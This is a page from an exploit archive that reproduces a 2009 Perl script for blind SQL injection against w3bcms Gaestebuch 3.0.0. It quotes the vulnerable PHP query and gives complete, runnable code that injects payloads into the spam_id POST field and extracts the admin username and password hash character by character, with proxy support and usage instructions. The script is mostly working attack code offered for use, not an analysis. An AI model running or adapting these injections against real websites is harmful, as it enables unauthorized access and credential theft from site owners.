首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
w3bcms Gaestebuch 3.0.0 Blind SQL Injection Exploit
来源:www.vfcocus.net 作者:DNX 发布时间:2009-04-13  
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request::Common qw(POST);
use Getopt::Long;

#                           \#'#/
#                           (-.-)
#    ------------------oOO---(_)---OOo-----------------
#    |          __             __                     |
#    |    _____/ /_____ ______/ /_  __  ______ ______ |
#    |   / ___/ __/ __ `/ ___/ __ \/ / / / __ `/ ___/ |
#    |  (__  ) /_/ /_/ / /  / /_/ / /_/ / /_/ (__  )  |
#    | /____/\__/\__,_/_/  /_.___/\__,_/\__, /____/   |
#    | Security Research Division      /____/ 2oo9    |
#    --------------------------------------------------
#    |  w3bcms Gaestebuch v3.0.0 Blind SQL Injection  |
#    |       (requires magic_quotes_gpc = Off)        |
#    --------------------------------------------------
# [!] Discovered.: DNX
# [!] Vendor.....: http://www.w3bcms.de
# [!] Detected...: 26.03.2009
# [!] Reported...: 29.03.2009
# [!] Response...: xx.xx.2009
#
# [!] Background.: CMS features in the frontend:
#                  » Ausgabe angelegter Seiten
#                  » Integrierter sicherer Spamschutz (kein Captcha!)
#                  » CMS Features wie Slogan Rotation, Datumausgabe, Seitenanzeige
#                  » Integrierter Besuchercounter (versteckt/sichtbar)
#               <b>» Sicherheit gegen Hackangriffe</b>
#                  » Schnelle Datenbankabfragen
#                  » 100% Suchmaschinenoptimiert (SEO)
#                  » Erweiterbar durch Module & Addons
#                  » Unterstützt Mod Rewrite URL's (optional)
#
# [!] Bug........: $_POST['spam_id'] in includes/module/book/index.inc.php near line 42
#
#                  37: } else if (isset($_GET['action']) && $_GET['action'] == "eintragen" && $modul_settings['aktiv'] == "0") {
#                  38:
#                  39:         $_POST['spamschutz'] = mysql_real_escape_string($_POST['spamschutz']);
#                  40:         $_POST['spamschutz'] = strtolower($_POST['spamschutz']);
#                  41:
#                  42:         $data = mysql_fetch_assoc(mysql_query("SELECT * FROM spamschutz WHERE id='".$_POST['spam_id']."' AND antwort='".$_POST['spamschutz']."'"));
#
# [!] Solution...: no response from vendor but the vendor has updated the module package
#

if(!$ARGV[2])
{
  print "\n                        \\#'#/                     ";
  print "\n                        (-.-)                      ";
  print "\n   ----------------oOO---(_)---OOo-----------------";
  print "\n   | w3bcms Gaestebuch v3.0.0 Blind SQL Injection |";
  print "\n   |                coded by DNX                  |";
  print "\n   ------------------------------------------------";
  print "\n[!] Usage: perl w3bcms.pl [Target] <Options>";
  print "\n[!] Example: perl w3bcms.pl -2 -u \"http://127.0.0.1/w3b/index.php?seite=2.gaestebuch\"";
  print "\n[!] Targets:";
  print "\n       -1              Get admin username";
  print "\n       -2              Get admin password hash";
  print "\n[!] Options:";
  print "\n       -u [url]        URL to vuln website";
  print "\n       -p [ip:port]    Proxy support";
  print "\n";
  exit;
}

my %options = ();
GetOptions(\%options, "1", "2", "u=s", "p=s");
my $ua      = LWP::UserAgent->new();
my $target  = $options{"u"}."&action=eintragen";

if($options{"p"})
{
  $ua->proxy('http', "http://".$options{"p"});
}

print "[!] Exploiting...\n";

check_bug($target);

if($options{"1"}) { get_username($target); }
elsif($options{"2"}) { get_password($target); }

print "\n[!] Exploit done\n";

sub check_bug
{
  my $url = shift;
  syswrite(STDOUT, "[!] Checking bug @ website: " , 28);
  my $inj = "' or 1=1/*";
  my $req = POST $url, [spam_id => $inj];
 
  my $res = $ua->request($req);
  if($res->content =~ /Bitte geben Sie Ihren Namen an/)
  {
    syswrite(STDOUT, "vuln", 4);
    print "\n";
  }
  else
  {
    syswrite(STDOUT, "not vuln", 8);
    exit;
  }
}

sub get_username
{
  my $target = shift;
  syswrite(STDOUT, "[!] Get username: ", 18);
  for(my $i = 1; $i <= 32; $i++)
  {
    my $found = 0;
    my $h = 32;
    while(!$found && $h <= 126)
    {
      if(exploit($target, $i, $h, "benutzername"))
      {
        $found = 1;
        syswrite(STDOUT, chr($h), 1);
      }
      $h++;
    }
  } 
}

sub get_password
{
  my $target = shift;
  syswrite(STDOUT, "[!] Get Hash: ", 14);
  for(my $i = 1; $i <= 32; $i++)
  {
    my $found = 0;
    my $h = 48;
    while(!$found && ($h <= 57 || $h <= 102))
    {
      if(exploit($target, $i, $h, "passwort"))
      {
        $found = 1;
        syswrite(STDOUT, chr($h), 1);
      }
      if($h == 57)
      {
        $h = 97;
      }
      else
      {
        $h++;
      }
    }
  }
}

sub exploit
{
  my $url = shift;
  my $i   = shift;
  my $h   = shift;
  my $c   = shift;
  my $inj = "' or 1=1 and substring((select ".$c." FROM admin limit 1),".$i.",1)=CHAR(".$h.")/*";
  my $req = POST $url, [spam_id => $inj];
 
  my $res = $ua->request($req);
  if($res->content =~ /Bitte geben Sie Ihren Namen an/)
  {
    return 1;
  }
  else
  {
    return 0;
  }
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Chance-i DiViS-Web DVR System
·PHP 5.2.9 curl safe_mode and o
·Xilisoft Video Converter Wizar
·The IBM BladeCenter Advanced M
·ftpdmin 0.96 RNFR Remote Buffe
·SWF Opener 1.3 (.swf File) Off
·Flatnuke <= 2.7.1 (level) Remo
·Exjune Guestbook v2 Remote Dat
·FreeBSD i386/AMD64 Execve /bin
·Geeklog <= 1.5.2 SEC_authentic
·HTML Email Creator <= 2.1b668
·Mini-stream Ripper (.M3U File)
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved